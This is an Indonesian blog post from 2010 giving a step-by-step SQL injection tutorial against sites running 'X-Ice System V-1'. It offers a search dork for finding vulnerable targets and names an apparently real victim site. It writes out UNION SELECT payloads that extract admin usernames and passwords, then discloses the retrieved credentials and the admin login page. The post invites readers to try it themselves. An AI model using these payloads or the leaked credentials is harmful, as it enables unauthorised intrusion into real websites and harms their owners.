Welcome To Blog
Selamat Membaca, Semoga Bermanfaat Ilmunya Ya...
Kamis, 14 Oktober 2010

SQL Injection pada X-Ice System V-1

kali ini saya akan mencoba
mengajak anda untuk bersama-sama mengeksploitasi website yang memiliki bug SQL Injection.
Bug di X-Ice system ditemukan oleh Cyberghost beberapa hari yang lalu, tapi sampai saat ini masih banyak
vulnerability dari situs-situs yang masih bisa dimanfaatkan [red: exploitasi].
Ya, mungkin cukup sekian pengantarnya, terima kasih. Dadah… :)
Disini saya tidak akan menjelaskan secara detil bagaimana query didapatkan, karena butuh artikel lain
untuk membahasnya, dan saya pun masih dalam tahap pembelajaran, jadi maaf-maaf aja, tutorialnya kurang lengkap.

:)
Untuk mencari targetnya, silahkan menggunakan keyword yang tepat …
ex : inurl:/devami.asp?id= geri
Korban yang saya dapatkan adalah :
http://www.radyopinarim.com/haber1/devami.asp?id=1
Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 1-nya.
Yang anda dapatkan adalah kurang lebih error yang seperti ini
Microsoft OLE DB Provider for ODBC Drivers hata ’80040e14′
[Microsoft][ODBC Microsoft Access Sürücüsü] ‘id=’ sorgu ifadesi içindeki Sözdizimi hatasý (eksik iþleç)
/haber1/devami.asp, satýr 8
Dari sini silahkan tepuk tangan, karena anda masih bisa mengeksploitasi situs ini.
Untuk mencari username nya anda tinggal mengganti angka 1 dengan
-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
kurang lebih alamat di browser seperti ini :
http://www.radyopinarim.com/haber1/devami.asp?id=-1+union+select+0,
kullaniciadi,2,3,4,5,6,7+from+admin
Yang saya dapatkan usernamenya adalah Kadrius
dan untuk mencari passwordnya
:
-1+union+select+0,sifre,2,3,4,5,6,7+from+admin
passwordnya adalah 19901990
Untuk login sebagai admin anda tinggal balik kehalaman
/admin/kontrol.asp
Ya, sekian saja tutorial singkat penggunaan SQL Injection sebagai exploitasi bug X-Ice system.
Selamat mencoba, terima kasih.

Di Posting Oleh : Prasetyo ~ http://stefpousibelv1.co.cc/

Artikel SQL Injection pada X-Ice System V-1 ini diposting oleh Prasetyo pada hari Kamis, 14 Oktober 2010. Terimakasih atas kunjungan anda serta kesediaan anda membaca artikel ini, Kritik dan saran dapat dapat sampaikan melalui kotak komentar. Semoga Artikel SQL Injection pada X-Ice System V-1 dapat Bermanfaat .. ^_^

0 Tulis Komentar:

FacebookTwitter

Berlangganan Posting Terbaru Via Email Disini:

Delivered by FeedBurner

Subscribe to ...Stef Pousibel... by Email

YM Admin

Pengikut

Total Pengunjung Web Counters
Free Web Counter
Informasi TI dll
Informasi IT dan Berita Terkini Tukeran Link

free counters